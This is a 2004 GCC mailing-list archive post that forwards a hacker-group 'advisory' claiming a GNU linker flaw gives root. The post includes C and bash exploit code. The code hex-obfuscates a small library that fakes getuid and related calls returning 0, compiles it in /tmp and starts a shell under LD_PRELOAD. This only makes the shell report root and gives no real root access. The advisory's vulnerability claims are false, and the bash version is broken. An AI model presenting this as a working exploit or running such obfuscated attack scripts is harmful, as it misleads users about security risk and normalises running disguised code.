This is the mail archive of the
gcc@gcc.gnu.org
mailing list for the GCC project.
bug
- From: Najib Bakari <weirdobox at gmail dot com>
- To: gcc at gnu dot org
- Date: Fri, 31 Dec 2004 19:03:43 +0000
- Subject: bug
- Reply-to: Najib Bakari <weirdobox at gmail dot com>
an exploit they say it gives root.
/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® - Advisory #01 - 28/12/04
--------------------------------------------------------
Program: ld - The GNU linker
Homepage: http://gcc.gnu.org
Vulnerable Versions: GNU gcc 3.4.3 and prior
Risk: High!!
Impact: Unchecked lenght fields
---------------------------------------------------------
- Description
---------------------------------------------------------
$ LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd
Value starts and ends with a slash and contains about 1200 characters.
LD_PRELOAD doesn't ignore setuid executables, like this one.
Unchecked lenght fields.
setuid(0);
setreuid(0,0);
int getuid() { return 0; }
int geteuid() { return 0; }
int getgid() { return 0; }
int getegid() { return 0; }
- Tested
---------------------------------------------------------
I have done minimal testing on this.
Slackware 10.0
- Explotation
---------------------------------------------------------
$gcc ld_xpl_nst.c -o ld_xp_nst
$./ld_xp_nst
sh-3.00# id
uid=0(root) gid=0(root) groups=100(users)
sh-3.00#
This will give you a root shell
- Solutions
--------------------------------------------------------
Not Yet or i don't know xD
- References
--------------------------------------------------------
http://neosecurityteam.org/Advisories/Advisory-01.txt
- Credits
-------------------------------------------------
Discovered by HaCkZaTaN <hck_zatan@hotmail.com>
[N]eo [S]ecurity [T]eam [NST]® - http://neosecurityteam.org/
Got Questions? http://neosecurityteam.org/foros/
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char NstCode[] =
"\x69\x6e\x74\x20\x67\x65\x74\x75\x69"
"\x64\x28\x29\x20\x7b\x20\x72\x65\x74"
"\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a"
"\x69\x6e\x74\x20\x67\x65\x74\x65\x75"
"\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
"\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d"
"\x0a\x69\x6e\x74\x20\x67\x65\x74\x67"
"\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
"\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d"
"\x0a\x69\x6e\x74\x20\x67\x65\x74\x65"
"\x67\x69\x64\x28\x29\x20\x7b\x20\x72"
"\x65\x74\x75\x72\x6e\x20\x30\x3b\x20"
"\x7d\x0a\x0/bin/sh";
void FG(int Opt, int Colour);
void BG(int Colour);
void RC();
int main()
{
FILE *Nst_C;
int x, y;
for(x = 1; x < 2; x++)
for(y = 37; y < 38; y++) {
FG(x,y);
printf("[N]eo [S]ecurity [T]eam [N][S][T]!\n");
}
RC();
Nst_C=fopen("/tmp/nst.c","w");
fprintf(Nst_C,"%s",NstCode);
fclose(Nst_C);
system("gcc -shared -o /tmp/nst.nfo /tmp/nst.c;rm -f /tmp/nst.c");
system("LD_PRELOAD=/tmp/nst.nfo /bin/sh");
for(x = 1; x < 2; x++)
for(y = 37; y < 38; y++) {
FG(x,y);
printf("[N]eo [S]ecurity [T]eam [N][S][T]!\n");
}
RC();
return 0;
}
void FG(int Opt, int Colour) {
printf("\033[%d;%dm", Opt, Colour);
}
void RC() {
printf("\033[0;m");
}
/* Bash Code:
#! /bin/bash
echo -e "\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
>/tmp/nst.c
echo -e "\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74"
>/tmp/nst.c
echo -e "\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30"
>/tmp/nst.c
echo -e "\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20"
>/tmp/nst.c
echo -e "\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74"
>/tmp/nst.c
echo -e "\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75"
>/tmp/nst.c
echo -e "\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh">/tmp/nst.c
sleep 1
gcc -shared -o /tmp/nst.nfo /tmp/nst.c
rm -rf /tmp/nst.c
sleep 4
echo -e "\n"
export LD_LIBRARY_PATH=/tmp
LD_PRELOAD=/tmp/nst.nfo /bin/sh
*/